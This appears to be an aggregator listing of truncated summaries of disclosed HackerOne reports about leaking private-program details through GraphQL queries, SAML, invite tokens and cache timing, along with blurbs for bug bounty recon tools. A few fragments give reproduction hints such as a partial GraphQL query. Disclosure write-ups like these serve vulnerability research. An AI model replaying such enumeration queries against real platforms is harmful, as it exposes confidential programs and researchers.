HackerOne: Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}`

The vulnerability allowed unauthorized users to retrieve sensitive information about private bug bounty programs on HackerOne, including program names, scope details, and the titles of reports. The issue was promptly addressed by the HackerOne team, who recognized its critical severity and awarde...

Bbscope - Scope Gathering Tool For HackerOne, Bugcrowd, And Intigriti!

The ultimate scope gathering tool for HackerOne, Bugcrowd, and Intigriti by sw33tLie. Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job. What about getting a list of android apps that you are allowed to test? We've got you...

Bbrecon - Python Library And CLI For The Bug Bounty Recon API

Bug Bounty Recon bbrecon is a free Recon-as-a-Service for bug bounty hunters and security researchers. The API aims to provide a continuously up-to-date map of the Internet "safe harbor" attack surface, excluding out-of-scope targets. It comes with an ergonomic CLI and Python library. This...

HackerOne: Unauthorized user can obtain `report_sources` attribute through Team GraphQL object

Summary: Hi team. And Happy New Year! Description: If I am not mistaken, then through this parameter we can define private programs with an external link. If this parameter is not empty, then the program is private. - "HackerOne Platform" Steps To Reproduce https://hackerone.com/graphql POST:...

HackerOne: Team object in GraphQL disclosed of private programs via the industry

Summary: Disclosure of private programs across the industry If the program is private, it will show industriy Steps To Reproduce "query": "query teamhandle:\"█████████\"id,industry" "data":"team":"id":"█████████","industry":"Computer Hardware \u0026 Peripherals" "query": "query...

HackerOne: Lack of cross-origin request blocking allows leaking of sensitive information on several endpoints

Summary: It is possible to make users leak sensitive information on several endpoints by measuring the time certain requests take to be cached. Description: If a request is made to https://hackerone.com/github/weaknesses and the user is logged in, the size of the response will be around 9kb becau...

HackerOne: The request tells the number of private programs, the new system of authorization /invite/token

Summary: Hi team. The old version of the invite program, looks simple. A link to the program in which you need to log in.Now this looks through token.So my PoC I think you can count work since you have changed the system to a new, token Description: Steps To Reproduce 1...

HackerOne: Ability to enumerate private programs using SAML

@ayoubfathi found a strong indicator of the existence of some private programs which were using SAML. Although it was not definitive, and we also warn teams using SAML that doing so removes their reasonable expectation of not being discoverable, we made some changes to help teams more easily...

HackerOne: External programs revealing info

A bug in an authorization check was found by @1337coder on an endpoint that was showing the members of a team, as well as the team member groups that were set up. Example output: "id":1, "username":"dirk", "name":"dirk", "bio":"", "url":"https://hackerone.com/dirk" , "id":2, "name":"Admin",...

HackerOne: Disclosure of private programs that have an "external" page on HackerOne

Hay again , We know that there are some companies have "external" page on HackerOne : https://hackerone.com/directory?query=type%3Aexternal&sort=name%3Aascending&page=1 Some of those companies are hosting private programs as well , with the same handles We can pick up any program from the externa...

HackerOne: HackerOne Private Programs users disclosure and de-anonymous-ize

Hi HackerOne Team, I have found a bug in HackerOne Platform allows any attacker to deanonymousize any security researcher using the platform and the most wild usage is to disclose some information about this security researcher if he is invited to a private program or not. Unfortunately HackerOne...